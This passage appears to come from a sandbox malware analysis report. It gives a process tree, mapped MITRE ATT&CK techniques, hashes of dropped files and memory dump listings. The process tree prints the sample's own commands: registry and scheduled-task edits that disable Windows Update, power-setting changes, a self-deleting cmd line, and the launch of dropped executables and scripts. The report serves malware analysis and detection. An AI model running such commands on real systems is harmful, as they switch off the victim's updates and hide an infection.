        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        9⤵
        
        PID:1504
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        9⤵
        
        PID:2596
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        9⤵
        
        PID:1072
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        9⤵
        
        PID:1680
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        9⤵
        
        PID:1576
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        9⤵
        
        PID:2404
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        9⤵
        
        PID:568
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        9⤵
        
        PID:2988
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        9⤵
        
        PID:468
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        9⤵
        
        PID:2560
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        8⤵
        Power Settings
        
        PID:556
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2664
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2004
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2840
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        9⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1600
        
        C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        8⤵
        
        PID:1780
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "sjrcqeodaodte"
        9⤵
        
        PID:1792
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        
        PID:2472
      - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:2704
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Users\Admin\AppData\Local\Temp\explorer.exe
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2280
- - C:\Users\Admin\AppData\Local\Temp\explorer.exe
    C:\Users\Admin\AppData\Local\Temp\explorer.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2852
- C:\Windows\SysWOW64\cmd.exe
  cmd /c start C:\Users\Admin\AppData\Local\Temp\windowshost.exe
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Users\Admin\AppData\Local\Temp\windowshost.exe
    C:\Users\Admin\AppData\Local\Temp\windowshost.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2772
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2888
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat" "
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1600
      - C:\driverPerf\cominto.exe
        
        "C:\driverPerf\cominto.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\explorer.exe

Filesize
95KB

MD5
19eab19c0d0a0b062c8eb85a94a79cc6

SHA1
3f0e2e88b9ff61e2e56edc473861cc4373af525a

SHA256
02eb6c61b19d347b9b6846285991142bb0d7515401f8fc4cf7f961be72a3c215

SHA512
550b2aa4b1892643f4a06d9df302f5685e9275ca9b302b8467fd35af806add36fe6ba6202488ea6209ee1b4a79f638d5f6e729bcf4a1b73fd38c4d4570b28223

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
2.1MB

MD5
fa0429acc4b9cfd414d24fae0e299790

SHA1
80d76038b5401080e18e6b015cbf806d9abe8589

SHA256
1440a0bb2287c84bc89c40255413dc2cab070a4382b59e9cffaa3abfe7da5489

SHA512
f6af06d7c505ab4d23a80fe616422302c5a87bfbefc81d6b0f4af36fcf86f30f865dcb4806581799a139f1b965c8d3b842125ac0b4c9a8ea59469601d9edff9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowshost.exe

Filesize
2.8MB

MD5
51ab765a1b1f884f936db4ffc642d728

SHA1
7b7741bf5dfeaed3860bf308733490017688fa46

SHA256
816835537df73c3297cb1a0ddfe02d8f051f0fd9486ee2b1e53969b37fa87f14

SHA512
e25fdd4a7f4fd8bfe9491ec8138ed08077c2c2cd63686e6e4a59859e27294cc35d0ff99ff0b29ae3c2901c6f99e970f6d8e80435d86811398fdb41cf1bbb5234

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e72f38579406c8bfc1e4c8b4c497bcce

SHA1
39ced7de061cd0aaf19948e95c540ad3391cfbf5

SHA256
b26699316a46e99ce6590b4d3fcd41275118254590174e778e3bbb207dd1b222

SHA512
cfeb6399d671e398d9824a058b21ff9111f4e517afdd7f7be50cdae3a4cbbbb96d7a5c7763847573a7742ee1d2fd341aaa22ec7cc260d5b1373e050414ca6d28

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O1G5TO0HNJDRB4GSQX5L.temp

Filesize
7KB

MD5
ec6743559327181472bf050aff1ee453

SHA1
843b1d4821324787df452a6e843c36701f5e3e9a

SHA256
2eacccc0f785d588152e85abb018151eee38149a6920aec322b638777910a999

SHA512
571f4b6275e11ab15052e9bd853aecc093c00a1cc5e947e1cc968f3542cd2377ee6782c6cfc875154b843acbe9bbad5a83fd2fa10d21acc12bcdc18d606ed9ba

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
564B

MD5
a29bfde7485c18bab1d5aaf31a7b7453

SHA1
8bd58665e33d49dbd9d814471031b7cbb8ef8f2d

SHA256
88289cee5a06a047d472c20607921a2ceec0ed434e9962802f498816bcf55c4b

SHA512
f78a0755f69fa0fd13c9cb07327b9c7a7af97eba203b38cd20a98f53b86e2cd09b7058b7e3e0d8b7a7f7f8401415b58a08fd1d9bb4b9fcd43ad6133154d72714

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
478B

MD5
ba3d478d76a03b6cae4dd27c3aed71e5

SHA1
14ebf1aee1163116150410cb2ce1b966f590b60e

SHA256
49ff5c6df4d05e7148a1fe6b133e261ed9f9fe96068226c392f5cbb14aebfaa5

SHA512
ccc62a5cb21d45e359ea1c4be9729bbbdb4ae2e8ffd4270795db26eacee005162a7f68e340055672afd1c25433a4885cd31abcef40f0765f50f187cef7121bd1

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
3KB

MD5
25e23e93f073fd8006c31578c6541ace

SHA1
4eb06835f9e4fb2c2eeda279d9bbdb777542c0e1

SHA256
814d01a00d408bd0fbe158e9d1ab87b5a175ce5bcbcd17fb91d2d9e7fd836fee

SHA512
1bd6cd3064d43bab429ad2d51ade125217bf24786c79492afb7c707bdda521f4dab4a0cec2678eb411e3ae86309011a576a59767ad64129523b42cd54b558b69

Download Submit
C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe

Filesize
212B

MD5
76764afd7b394cd6a9c36fa16d4c88fc

SHA1
5274a18139edf134230252c97652bfa6319b1a78

SHA256
e58f2652ec82227d6ecacc733adb6e9812fcb39283ef87aba2be65326851e50e

SHA512
3018cbc23b59527b0fe54fc17f13735dddf2e91ac188afb7abdb6fc932e2a965d725b0ffaa8b03fcc7c9f4fbd9f1ba3aafde6a2e3fe1112ccbe42fca44be01ae

Download Submit
C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat

Filesize
27B

MD5
61b88edb5f6dca914ee05650653d8223

SHA1
4b61f3f21e8c981aaa73e375d090de82be46720d

SHA256
eba6d05af3adbcc9a111fe968c3a2c725221f8f7896df3490bc2509bec01cf12

SHA512
1eea3fe2ca12c0d9bc3f9a7a13a1438cdd25e35607232025477af885db7987f6cd4d03613e6be0f6c8457e9db3eaf9b394f62ed14dffa4fbb36c1c07d8e5e7b5

Download Submit
\driverPerf\cominto.exe

Filesize
2.5MB

MD5
4344aa160852993fab07ae5793321886

SHA1
d33a04a9f58d6172bfaa611ceeb03b24b7c5bee5

SHA256
bbbebdfec732e0805dc3865cfa2f546120e7300d8d6d98ba71ca85026375add4

SHA512
557c569a182284d43db1342aaa64b61acae4665548fa2a7c63af05d45ae1058d070f536c6c80a859e54a051177d21cc21c86b3de4cb03d1d63c993495067d2c0

Download Submit
memory/784-97-0x000007FFFFFD7000-0x000007FFFFFD8000-memory.dmp

Filesize
4KB

Download
memory/784-99-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/1780-142-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1780-136-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1780-140-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/1780-141-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1780-134-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1780-138-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1780-130-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1780-132-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1792-159-0x0000000001C50000-0x0000000001C56000-memory.dmp

Filesize
24KB

Download
memory/1804-42-0x0000000001060000-0x00000000012EE000-memory.dmp

Filesize
2.6MB

Download
memory/1804-43-0x00000000002C0000-0x00000000002CE000-memory.dmp

Filesize
56KB

Download
memory/2376-53-0x0000000001FF0000-0x0000000001FF8000-memory.dmp

Filesize
32KB

Download
memory/2376-52-0x000000001B540000-0x000000001B822000-memory.dmp

Filesize
2.9MB

Download
memory/2556-67-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2556-73-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2556-77-0x000007FFFFFD5000-0x000007FFFFFD6000-memory.dmp

Filesize
4KB

Download
memory/2556-61-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2556-75-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2556-78-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2556-69-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2556-63-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2556-65-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2556-71-0x0000000140000000-0x0000000140057000-memory.dmp

Filesize
348KB

Download
memory/2608-60-0x0000000001FE0000-0x0000000001FE6000-memory.dmp

Filesize
24KB

Download
memory/2608-46-0x000000001B550000-0x000000001B772000-memory.dmp

Filesize
2.1MB

Download
memory/2852-31-0x0000000000C20000-0x0000000000C3E000-memory.dmp

Filesize
120KB

Download
memory/2868-44-0x0000000000130000-0x0000000000351000-memory.dmp

Filesize
2.1MB

Download
memory/3012-122-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/3012-123-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download